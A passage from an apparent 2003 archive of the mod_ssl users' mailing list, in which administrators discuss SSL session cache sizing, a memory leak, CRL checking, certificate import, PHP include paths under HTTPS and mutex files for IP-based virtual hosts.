Received: from geoff by cyrus.vandervecken.com with local (Exim 3.35 #1 (Debian))
	id 1AXXBI-0002Xe-00; Fri, 19 Dec 2003 18:49:28 -0800
From: Geoff Thorpe 
To: modssl-users@modssl.org
Subject: Re: Suggest SSLSessionCacheTimeout and Cache sizes?
Date: Fri, 19 Dec 2003 21:49:29 -0500
User-Agent: KMail/1.5.4
References: <3FE3659F.40205@flarn.com>
In-Reply-To: <3FE3659F.40205@flarn.com>
Cc: Ken Snider 
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200312192149.29889.geoff@geoffthorpe.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Ken,

On December 19, 2003 03:54 pm, Ken Snider wrote:
> Does anyone have any information on shmcb cache sizings? Specifically,
> how many bytes per request are taken up in shm for each cache entry?
> I'd like to make sure my shm size is sufficient for the Cache Timeouts
> I want to use.

The geometry and administrative data in the shared-memory segment create 
their own nominal overheads, but for the most part the space taken to 
store a session is largely determined by openssl's asn1 encoding of the 
corresponding SSL_SESSION object. For a "typical" ssl session, you'd 
expect this to be around 120-150 bytes. OTOH if you use client 
certificate verification, things get a bit more serious - ie. the bulk of 
the encoded session is a copy of the client-certificate, so this can 
easily grow to 1Kb or more. As for the organisation of the cache data, I 
can blab on about that - but won't do so unless dared.

> Secondly, is there any reason why the SSLSessionCacheTimeout can't be
> arbitrarily large (say, an hour)? And at what size (or number of
> entries) does the cache size begin to seriously hamper lookups within
> the cache itself?

This was a problem with the earlier caching code (shmht) and was part of 
my motivation for designing shmcb (though there were numerous other 
reasons, bugs and slothful speed being two major ones). Namely, the cache 
would essentially block when full and fail to add new sessions until an 
expiry-checker would periodically scan over the cache and delete anything 
old. This meant you needed to choose cache timeouts carefully to avoid 
this situation - because if you're under load and the cache fills, you're 
going to be even *more* under load on account of attempted session 
resumes resorting to full handshakes more and more often.

shmcb uses a different approach to shmht - if the cache fills (or more 
accurately, if the sub-cache corresponding to a session you're trying to 
add fills), then sessions are scrolled out of the (sub-)cache until there 
is enough room for the new one. Sessions are prematurely expired in order 
of their expected expiry time - that's a complicated phrase because it's 
not necessarily quite the same thing as "the oldest sessions", because 
you may be using vhosts that use different expiry times for sessions.

The consequence of this behaviour is that if you have limited shared 
memory for the cache and your load is sufficient that sessions generally 
get prematurely removed before reaching their specified timeout(s), then 
so be it - the "effective timeout" implicitly adapts to maintain a full 
cache and to favour newly added sessions over those that have been there 
a while. When the load drops again, this effective timeout grows until 
that point where sessions begin to reach their natural expiry time and 
are then removed irrespective of cache utilisation. Moreover, the use of 
the cyclic buffers, sub-caches, and indexing tricks means that the speed 
of cache operations should be pretty constant irrespective of the cache 
size or utilisation.

Which is all a rather long-winded way of saying "yes" to your 
"Secondly,..." question. With shmcb you can choose the timeout according 
to security arguments alone, cache size and usage will automatically 
remove sessions prematurely when necessary to keep things "flowing 
nicely", so the timeout is more of an administrative setting that says 
"if the session is still in the cache after *this* many seconds, I want 
it explicitly removed to force any future resume attempts to undergo a 
full handshake anyway". The timeout only dictates what happens when the 
cache has space to spare.

For more information, this old post linked off to 2 or 3 other posts with 
all the run-down on shmcb and associated junk;
  http://marc.theaimsgroup.com/?l=apache-modssl&m=102286849318705&w=2

Or searching for "shmcb" in the archives can pull up more recent threads 
too.

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Dec 22 21:01:26 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 18C57A8972; Mon, 22 Dec 2003 21:01:26 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dymwsm08.mailwatch.com (dymwsm08.mailwatch.com [204.253.83.44])
	by master.modssl.org (Postfix) with ESMTP id 45A1BA8939
	for ; Mon, 22 Dec 2003 21:01:05 +0100 (CET)
Received: from MWSC0203.MW4.MAILWATCH.COM (mwsc0203.mw4.mailwatch.com [204.253.83.133])
	by dymwsm08.mailwatch.com (8.12.9/8.12.9) with ESMTP id hBMK0sRp027350
	for ; Mon, 22 Dec 2003 15:00:54 -0500
Received: from mail pickup service by MWSC0203.MW4.MAILWATCH.COM with Microsoft SMTPSVC;
	 Mon, 22 Dec 2003 15:00:54 -0500
Received: from 204.253.83.71 ([204.253.83.71]) by MWSC0203 with SMTP id 0002000307387ef9-bcc0-4322-b65e-5833e6ab86bd;
	 Mon, 22 Dec 2003 15:00:54 -0500
Received: from bigbird.entegrity.com (bigbird.entegrity.com [192.92.110.50])
	by dymwsm09.mailwatch.com (8.12.9/8.12.9) with ESMTP id hBMK0sYu006073
	for ; Mon, 22 Dec 2003 15:00:54 -0500
Received: from JOHUGHES ([192.92.110.174]) by bigbird.entegrity.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.10)
	id VDLRDB82; Mon, 22 Dec 2003 14:55:31 -0500
From: "John Hughes" 
To: 
Subject: RE: FW: Memory leak - Apache2.0.47 and openSSL 0.9.7c
Date: Mon, 22 Dec 2003 20:05:46 -0000
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0)
In-Reply-To: <20031219125832.GA21483@gw>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
X-MW-BTID: 090025000020033567205400017
X-MW-CTIME: 1072123254
X-MW-SENDING-MTA: 192.92.110.50
HOP-COUNT: 1
X-MAILWATCH-INSTANCEID: 0102000307387ef9-bcc0-4322-b65e-5833e6ab86bd
X-OriginalArrivalTime: 22 Dec 2003 20:00:54.0632 (UTC) FILETIME=[4EB8CE80:01C3C8C6]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "John Hughes" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Mads,

that worked - thank you.

Had my test harness working for about 75 hours - and performed about 13
Million trans.  Not a memory leak in sight.

Thanks again

John



> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Mads Toftum
> Sent: 19 December 2003 12:59
> To: modssl-users@modssl.org
> Subject: Re: FW: Memory leak - Apache2.0.47 and openSSL 0.9.7c
>
>
> On Fri, Dec 19, 2003 at 11:01:57AM -0000, John Hughes wrote:
> > I have no 3rd party modules loaded.  The testing I did was with
> and without
> > mod_ssl loaded.  Only when mod_ssl was loaded - and SSL was
> used - did I see
> > a memory leak under load.
> >
> > My SSLSessionCache values are the default and are:
> >
> > SSLSessionCache		dbm:logs/ssl_scache
> > SSLSessionCacheTimeout	300
> >
> On linux you really should be using a shared memory session cache - like
> SSLSessionCache shmcb:logs/ssl_gcache_data(512000)
> SSLSessionCacheTimeout        300
>
>
> vh
>
> Mads Toftum
> --
> `Darn it, who spiked my coffee with water?!' - lwall
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Dec 28 22:39:41 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 77B20A8948; Sun, 28 Dec 2003 22:39:41 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from vsmtp2.tin.it (vsmtp2.tin.it [212.216.176.222])
	by master.modssl.org (Postfix) with ESMTP id 13E7CA8937
	for ; Sun, 28 Dec 2003 22:39:23 +0100 (CET)
Received: from tovos5096kmh05 (80.182.195.104) by vsmtp2.tin.it (7.0.019)
        id 3FE030400024777D for modssl-users@modssl.org; Sun, 28 Dec 2003 22:39:17 +0100
Message-ID: <005b01c3cd8b$0a77d6c0$68c3b650@tovos5096kmh05>
From: "Gianluca Tovo" 
To: 
Subject: CRL management in Apache
Date: Sun, 28 Dec 2003 22:39:14 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gianluca Tovo" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello everybody,
I'm here after a check on docs and various internet resources to have an
autoritative \
answer.

How it's possible to verify the validity of client certificates in SSL with
Apache \
using the CDP extension present in the certificate itself? This mechanism
allow you \
to use splitted CRLs easily.

All I could find it's the CRL management by hand from the webadm restarting
the \
server each time (or by some crontab scripting) directly from the CA
directory.

It's possible?
It's a feature that is going to be introduced in some next mod_SSL releases?
It's up to the developer to write some code on some API to manage that
automatic CRL \
acquisition and management?

Thanks in advance for you attention.


Gianluca Tovo
Telecom Italia Information Technology S.p.A.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Dec 29 07:38:45 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A839CA8965; Mon, 29 Dec 2003 07:38:45 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cwb.pacific.net.hk (cwb.pacific.net.hk [202.14.67.92])
	by master.modssl.org (Postfix) with ESMTP id 0E8FCA8936
	for ; Mon, 29 Dec 2003 07:38:27 +0100 (CET)
Received: from pacific ([202.64.41.172])
        by cwb.pacific.net.hk with SMTP
        id hBT6cUct002098 for ; Mon, 29 Dec 2003 14:38:33 +0800 (CST)
Message-ID: <002f01c3cdd5$55cf8f60$0200a8c0@net.hk>
From: "Arthur Chan" 
To: 
Subject: How to import self signed certificate as trusted certificate ?
Date: Mon, 29 Dec 2003 14:31:01 +0800
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_002C_01C3CE18.61B821A0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2615.200
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Arthur Chan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_002C_01C3CE18.61B821A0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi all.
I've created a self-signed certificate for testing purposes. I would =
like to import that into my IE5 and Ntescape7.1 browsers as trusted =
certificate so that the browser will accept the applet requests =
implicitly.
Can someone point me in the right direction please i.e. read-ups, howto =
documentation, etc?
Also this: my applet can access and display jpeg images but java console =
throws the typical "Access Denied" error when I try to access a local =
notepad.txt file.
HTML's, applets,  jpegs and text files are all in the same directory on =
the server, I find it astounding that the applet cannot access its own =
text files, co-located in exactly the same directory without being a =
"signed applet", which brings me back to the purpose of this email...
Does anyone find this a bit over the top?
TIA :-)

------=_NextPart_000_002C_01C3CE18.61B821A0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hi all.


I've created a self-signed certificate =
for testing=20
purposes. I would like to import that into my IE5 and Ntescape7.1 =
browsers as=20
trusted certificate so that the browser will accept the applet requests=20
implicitly.


Can someone point me in the right =
direction please=20
i.e. read-ups, howto documentation, etc?


Also this: my applet can access and =
display jpeg=20
images but java console throws the typical "Access Denied" error =
when I try=20
to access a local notepad.txt file.


HTML's, applets,  jpegs and text files =
are all in=20
the same directory on the server, I find it astounding that the applet =
cannot=20
access its own text files, co-located in exactly the same directory =
without=20
being a "signed applet", which brings me back to the purpose of this=20
email...


Does anyone find this a bit over the=20
top?


TIA :-)


------=_NextPart_000_002C_01C3CE18.61B821A0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 30 11:02:22 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C9160A8977; Tue, 30 Dec 2003 11:02:22 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id BD266A893D
	for ; Tue, 30 Dec 2003 11:02:05 +0100 (CET)
Received: from Maggotts2.rnib.org.uk (maggotts2.rnib.org.uk [194.128.16.193])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id hBUA1TV25006
	for ; Tue, 30 Dec 2003 10:01:49 GMT
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F05ADDA81@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: Cannot Access Includes Above Current Directory
Date: Tue, 30 Dec 2003 10:01:23 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Sorry I haven't got back to you sooner. I think I understand the problem
better now.

I suspect this is down to environment variables. Try using "phpinfo();" via
SSL and non-SSL connections and see if you can see which variables aren't in
the first one (curl and diff are very handy for this).

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

There is more historical evidence for the existence of Jesus Christ than for
either Henry VIII or Julius Caesar.


> -----Original Message-----
> From: Steve Benson [mailto:sbenson@sdfair.com]
> Sent: 16 December 2003 17:29
> To: modssl-users@modssl.org
> Subject: RE: Cannot Access Includes Above Current Directory
> 
> 
> John:
> 
> Thanks for taking the time to respond to my question it's much
> appreciated.
> 
> I can understand this may be thought of as nothing to do with mod_ssl
> (and that's most likely true).  I'm not sure what other list might be
> more appropriate and was trying to reach knowledgeable folks with both
> Apache and SSL experience.
> 
> It might help if I explained the reason I tried the mod_ssl 
> list is that
> -
> 
> - I've created a number of Apache web sites using PHP but this is my
> first using SSL(mod_ssl incorporated into Apache 2.0.48, 
> openssl). I've
> never encountered anything like this before in web development.
> 
> - All scripts work fine with relative paths to include files 
> as long as
> they're accessed via http and are not in the
> https virtual server directory tree structure.
> 
> - When accessing the same scripts within the https virtual server tree
> the scripts cannot reference any include files that
> aren't at the same level or below in the directory tree.
> 
> - If the include file is made available at the same level or below, no
> problem accessing via relative or absolute paths.
> 
> - Even when the paths to include files are changed to absolute paths
> they fail if the file is above the current directory in the tree.  For
> some reason I can't go up the directory tree from within the https
> virtual server directory structure.
> This is true no matter where I am in the structure i.e. if I'm two
> levels deep in the directory tree I can't reference a file up 
> one level.
> If I'm three levels deep I can't reference files back on level two,
> bummer!
> 
> This seems to be a configuration problem but I've exhausted 
> my resources
> trying to figure out what within httpd.conf or ssl.conf would 
> be causing
> this behavior.
> 
> Seems like such a small thing but with an existing site structure I'd
> have to replicate many scripts, css',images etc. to make the 
> components
> I need available within the https virtual server's directory 
> structure.
> What a maintenance nightmare!
> 
> Any suggestions you may offer are appreciated.
> 
> Thanks,
> 
> .......... Steve
> 
> 
> 
> -----Original Message-----
> From: John.Airey@rnib.org.uk [mailto:John.Airey@rnib.org.uk] 
> Sent: Tuesday, December 16, 2003 2:30 AM
> To: modssl-users@modssl.org
> Subject: RE: Cannot Access Includes Above Current Directory
> 
> 
> This isn't really a mod_ssl issue, but I suggest you use the absolute
> path for included php as the current directory is probably where the
> httpd binary is, or perhaps where the config files are.
> 
> (I changed the subject as my last post was rejected, somehow)
> 

- 
DISCLAIMER: 

NOTICE: The information contained in this email and any attachments is 
confidential and may be privileged. If you are not the intended 
recipient you should not use, disclose, distribute or copy any of the 
content of it or of any attachment; you are requested to notify the 
sender immediately of your receipt of the email and then to delete it 
and any attachments from your system. 

RNIB endeavours to ensure that emails and any attachments generated by 
its staff are free from viruses or other contaminants. However, it 
cannot accept any responsibility for any  such which are transmitted.
We therefore recommend you scan all attachments. 

Please note that the statements and views expressed in this email and 
any attachments are those of the author and do not necessarily represent 
those of RNIB. 

RNIB Registered Charity Number: 226227 

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 30 13:19:09 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E058DA8977; Tue, 30 Dec 2003 13:19:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cyberiansoftware.com (router.pardos.net [66.202.69.50])
	by master.modssl.org (Postfix) with SMTP id 2C451A893D
	for ; Tue, 30 Dec 2003 13:18:52 +0100 (CET)
Received: (qmail 22310 invoked from network); 30 Dec 2003 12:18:31 -0000
Received: from 24.238.84.119.cmts.sth.ptd.net (HELO openhardware.net) (24.238.84.119)
  by cyberiansoftware.com with SMTP; 30 Dec 2003 12:18:31 -0000
Message-ID: <3FF16D1E.4060405@openhardware.net>
Date: Tue, 30 Dec 2003 12:18:38 +0000
From: Tom Walsh 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030630
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: SSLMutex file(s) with IP-Virtuals
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tom Walsh 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello All,

We have put together a virtual IP based apache+mod_ssl server.  This is 
the first time I have done this type of thing as we were running a name 
based virtual server up to this point.  I have a few questions, 
obviously.  ;-)  I stacked three IP addresses up on the ethernet using 
ifconfig:

    ifconfig eth0:1 64.x.x.100 netmask 255.255.255.0
    ifconfig eth0:2 64.x.x.101 netmask 255.255.255.0

I created three apache servers, each binds to it's individual IP address 
via the Listen directive within apache, e.g.:

    NameVirtuals: Listen 64.x.x.99:80
    Secure0: Listen 64.x.x.100:443
    Secure1: Listen 64.x.x.101:443

A netstat verifies that this binding is as expected and the individual 
apache servers (and children) are listening where they should be.

The named virtuals is using vhosts/Vhost.conf to specifiy the various 
virtual domains that are available via port 80 of the 64.x.x.99 server.  
I presume that we can only listen on port 80 of that IP and that an 
attempt to also listen on port 443 will result in a nasty failure?  Yes, 
we did try to listen on both port 80 and port 443 with a single server, 
heh, I don't take anybodies word for it if they say "it cannot be done", 
but such information is not ignored out of hand.  ;-)  heh

Anyhow, everything seems to be working fine.  Each server has its own 
unique user + group defined: apache, apache_s1, and apache_s2.  What I 
was confused about was the shared (?) files used for ssl housekeeping, 
these are:

    ssl_mutex
    ssl_scache

 From the apache documentation, which is extremely terse regarding IP 
virtuals(!), it seems to suggest that the semaphore signaling would be 
used as an interprocess communication sync method between modules / 
functions of the particular server.  The impression that I got from the 
docs was that a mutex file would need to be defined for each server 
running modssl?  I defined them as such:

    Secure0: SSLMutex  file:/var/cache/apache2-mod_ssl/ssl_mutex0
    Secure1: SSLMutex  file:/var/cache/apache2-mod_ssl/ssl_mutex1

This way I can avoid collisions between the two independant apache 
servers running modssl and avoid mutex problems?  My understanding is 
that each server would have a copy of libc (whatever) and semaphores 
would be peculiar to the loaded modssl & apache runtimes, therefore, 
reusing the ssl_mutex file would result in very bad things happening?  I 
did the same for the ssl_scache files, defined unique files for them as 
well.


Yes, we also segragated the error_log, httpd-pid, etc., files as well.  
The cert is shared (defined) as being common to the two secure services 
(servers), we have no need for a seperate cert as yet, this is still a 
test server.

TIA,

TomW


-- 
Tom Walsh - WN3L - Embedded Systems Consultant
http://openhardware.net, http://cyberiansoftware.com
"Windows? No thanks, I have work to do..."
----------------------------------------------------



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 30 17:45:51 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AB195A8976; Tue, 30 Dec 2003 17:45:51 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from email.sdfair.com (email.sdfair.com [209.132.87.9])
	by master.modssl.org (Postfix) with ESMTP id B4005A8937
	for ; Tue, 30 Dec 2003 17:45:33 +0100 (CET)
Received: from email.sdfair.com (Not Verified[127.0.0.1]) by email.sdfair.com with NetIQ MailMarshal (v5.5.4.16)
	id ; Tue, 30 Dec 2003 08:45:27 -0800
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable
Subject: RE: Cannot Access Includes Above Current Directory
Date: Tue, 30 Dec 2003 08:45:26 -0800
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Cannot Access Includes Above Current Directory
Thread-Index: AcPOvC85NLfDlbDcRXCPovKShICBnwANz9hQ
From: "Steve Benson" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Steve Benson" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

John:

Thanks for your suggestion.

I checked the output of phpinfo from both http and https and other than
directory name differences I found the following variables in the https
info:

Variable                Value=20
UNIQUE_ID               8Sevn38AAAEAAALTfvAAAAAA =20
nokeepalive             1 =20
ssl-unclean-shutdown    1 =20
downgrade-1_0           1 =20
force-response-1_0      1 =20
HTTPS                   on =20
SSL_VERSION_INTERFACE   mod_ssl/2.0.48 =20
SSL_VERSION_LIBRARY     OpenSSL/0.9.6l =20
SSL_PROTOCOL            SSLv3 =20
SSL_CIPHER              RC4-MD5 =20
SSL_CIPHER_EXPORT       false =20
SSL_CIPHER_USEKEYSIZE   128 =20
SSL_CIPHER_ALGKEYSIZE   128 =20
SSL_CLIENT_VERIFY       NONE =20
SSL_SERVER_M_VERSION    1 =20
SSL_SERVER_M_SERIAL     00 =20
SSL_SERVER_V_START      Dec 5 15:42:10 2003 GMT =20
SSL_SERVER_V_END        Dec 2 15:42:10 2013 GMT =20
SSL_SERVER_S_DN         /C=3DUS/CN=3Dwebdev/Email=3Dsbenson@sdfair.com =20
SSL_SERVER_S_DN_C       US =20
SSL_SERVER_S_DN_CN      webdev =20
SSL_SERVER_S_DN_Email   sbenson@sdfair.com =20
SSL_SERVER_I_DN         /C=3DUS/CN=3Dwebdev/Email=3Dsbenson@sdfair.com =20
SSL_SERVER_I_DN_C       US =20
SSL_SERVER_I_DN_CN      webdev =20
SSL_SERVER_I_DN_Email   sbenson@sdfair.com =20
SSL_SERVER_A_KEY        rsaEncryption =20
SSL_SERVER_A_SIG        md5WithRSAEncryption =20
SSL_SESSION_ID
110B6D1F72C43479A06BC5EA6310AF411F903713674E82256769B2F923AF5727 =20
Connection              close

I didn't see any thing that stood out, do you see anything there that
might shed some light on this problem?

Thanks,

............ Steve

-----Original Message-----
From: John.Airey@rnib.org.uk [mailto:John.Airey@rnib.org.uk]=20
Sent: Tuesday, December 30, 2003 2:01 AM
To: modssl-users@modssl.org
Subject: RE: Cannot Access Includes Above Current Directory


Sorry I haven't got back to you sooner. I think I understand the problem
better now.

I suspect this is down to environment variables. Try using "phpinfo();"
via SSL and non-SSL connections and see if you can see which variables
aren't in the first one (curl and diff are very handy for this).

-=20
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind, Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848
John.Airey@rnib.org.uk=20

There is more historical evidence for the existence of Jesus Christ than
for either Henry VIII or Julius Caesar.


> -----Original Message-----
> From: Steve Benson [mailto:sbenson@sdfair.com]
> Sent: 16 December 2003 17:29
> To: modssl-users@modssl.org
> Subject: RE: Cannot Access Includes Above Current Directory
>=20
>=20
> John:
>=20
> Thanks for taking the time to respond to my question it's much=20
> appreciated.
>=20
> I can understand this may be thought of as nothing to do with mod_ssl=20
> (and that's most likely true).  I'm not sure what other list might be=20
> more appropriate and was trying to reach knowledgeable folks with both

> Apache and SSL experience.
>=20
> It might help if I explained the reason I tried the mod_ssl
> list is that
> -
>=20
> - I've created a number of Apache web sites using PHP but this is my=20
> first using SSL(mod_ssl incorporated into Apache 2.0.48, openssl).=20
> I've never encountered anything like this before in web development.
>=20
> - All scripts work fine with relative paths to include files
> as long as
> they're accessed via http and are not in the
> https virtual server directory tree structure.
>=20
> - When accessing the same scripts within the https virtual server tree

> the scripts cannot reference any include files that aren't at the same

> level or below in the directory tree.
>=20
> - If the include file is made available at the same level or below, no

> problem accessing via relative or absolute paths.
>=20
> - Even when the paths to include files are changed to absolute paths=20
> they fail if the file is above the current directory in the tree.  For

> some reason I can't go up the directory tree from within the https=20
> virtual server directory structure. This is true no matter where I am=20
> in the structure i.e. if I'm two levels deep in the directory tree I=20
> can't reference a file up one level.
> If I'm three levels deep I can't reference files back on level two,
> bummer!
>=20
> This seems to be a configuration problem but I've exhausted
> my resources
> trying to figure out what within httpd.conf or ssl.conf would=20
> be causing
> this behavior.
>=20
> Seems like such a small thing but with an existing site structure I'd=20
> have to replicate many scripts, css',images etc. to make the=20
> components I need available within the https virtual server's=20
> directory structure.
> What a maintenance nightmare!
>=20
> Any suggestions you may offer are appreciated.
>=20
> Thanks,
>=20
> .......... Steve
>=20
>=20
>=20
> -----Original Message-----
> From: John.Airey@rnib.org.uk [mailto:John.Airey@rnib.org.uk]
> Sent: Tuesday, December 16, 2003 2:30 AM
> To: modssl-users@modssl.org
> Subject: RE: Cannot Access Includes Above Current Directory
>=20
>=20
> This isn't really a mod_ssl issue, but I suggest you use the absolute=20
> path for included php as the current directory is probably where the=20
> httpd binary is, or perhaps where the config files are.
>=20
> (I changed the subject as my last post was rejected, somehow)
>=20

-=20
DISCLAIMER:=20

NOTICE: The information contained in this email and any attachments is=20
confidential and may be privileged. If you are not the intended=20
recipient you should not use, disclose, distribute or copy any of the=20
content of it or of any attachment; you are requested to notify the=20
sender immediately of your receipt of the email and then to delete it=20
and any attachments from your system.=20

RNIB endeavours to ensure that emails and any attachments generated by=20
its staff are free from viruses or other contaminants. However, it=20
cannot accept any responsibility for any  such which are transmitted. We
therefore recommend you scan all attachments.=20

Please note that the statements and views expressed in this email and=20
any attachments are those of the author and do not necessarily represent

those of RNIB.=20

RNIB Registered Charity Number: 226227=20

Website: http://www.rnib.org.uk=20
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 30 21:11:31 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 91773A8976; Tue, 30 Dec 2003 21:11:31 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cyberiansoftware.com (router.pardos.net [66.202.69.50])
	by master.modssl.org (Postfix) with SMTP id 7809FA8937
	for ; Tue, 30 Dec 2003 21:11:14 +0100 (CET)
Received: (qmail 29434 invoked from network); 30 Dec 2003 20:10:52 -0000
Received: from 24.238.84.119.cmts.sth.ptd.net (HELO openhardware.net) (24.238.84.119)
  by cyberiansoftware.com with SMTP; 30 Dec 2003 20:10:52 -0000
Message-ID: <3FF1DBD4.4000909@openhardware.net>
Date: Tue, 30 Dec 2003 20:11:00 +0000
From: Tom Walsh 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030630
X-Accept-Language: en-us, en
MIME-Version: 1.0
